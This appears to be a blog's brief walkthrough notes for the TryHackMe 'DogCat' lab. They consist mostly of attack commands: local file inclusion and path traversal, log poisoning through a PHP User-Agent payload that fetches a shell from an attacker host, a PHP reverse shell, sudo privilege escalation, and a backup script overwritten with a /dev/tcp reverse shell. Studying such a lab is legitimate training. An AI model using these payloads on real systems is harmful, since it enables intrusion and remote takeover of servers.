DogCat

http://10.10.120.68/?view=php://filter/convert.base64-encode/cat/resource=index

http://10.10.120.68/?view=php://filter/convert.base64-encode/cat/resource=flag

view-source:http://10.10.120.68/?view=../../../../etc/cat/../passwd&ext=

view-source:http://10.10.120.68/?view=../../../../var/log/apache2/cat/../access.log&ext=

https://toolbox.itsec.tamu.edu/


User-Agent: <?php file_put_contents('shell.php',file_get_contents('http://10.8.135.218/shell.php'))?>


Shell folder:

cp /usr/share/webshells/php/php-reverse-shell.php .

mv php-reverse-shell.php shell.php  

cat shell.php //Make sure to modify the IP and port inside the shell file

python -m http.server or 8081

rlwrap nc -lvnp 8888 

find / -type f -name flag* 2>/dev/null //to find all flags

Inside Shell:

$ cd /var/www/html


whoami

id

ls -la

sudo -l

sudo /usr/bin/env /bin/bash

cd /root


Final Flag:

rlwrap nc -lvnp 8888  

cd /opt/

cat backup.sh

tar cf /root/container/backup/backup.tar /root/container

sudo /usr/bin/env /bin/bash

echo '#!/bin/bash' > backup.sh

echo 'bash -i >& /dev/tcp/Attacking-IP/8888 0>&1' >> backup.sh

cat backup.sh

Exec :

bash -i >& /dev/tcp/Attacking-IP/8888 0>&1  || run in folder:  nc -lvnp 9001 


https://toolbox.itsec.tamu.edu/


Ref:

https://www.youtube.com/watch?v=zGDbi15Jkqw
https://tryhackme.com/room/dogcat

https://gtfobins.github.io/
https://highon.coffee/blog/reverse-shell-cheat-sheet/#php-reverse-shell
https://medium.com/@anhackx/dogcat-tryhackme-2024-916bc3b1b07d

Comments

Popular posts from this blog

Burp Suite – Automated Vulnerabilities Findings

Havij - Advanced Automated SQL Injection

SQL Injection Attacks | Shahul Hameed